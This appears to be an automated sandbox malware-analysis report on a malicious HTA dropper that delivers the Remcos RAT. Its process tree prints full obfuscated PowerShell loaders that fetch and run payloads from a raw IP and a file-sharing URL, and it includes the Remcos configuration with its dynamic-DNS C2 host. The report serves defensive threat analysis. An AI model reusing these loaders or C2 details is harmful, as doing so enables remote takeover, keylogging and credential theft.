Windows
Analysis Report
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Overview
General Information
Detection
Cobalt Strike, Remcos, HTMLPhisher
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7420 cmdline: mshta.exe "C:\Users\user\Desktop\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 7492 cmdline: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 7760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 7776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 7864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4, eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN '')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- CasPol.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
REMCOS_RAT_variants | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
REMCOS_RAT_variants | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary
Source: | Author: Florian Roth (Nextron Systems) |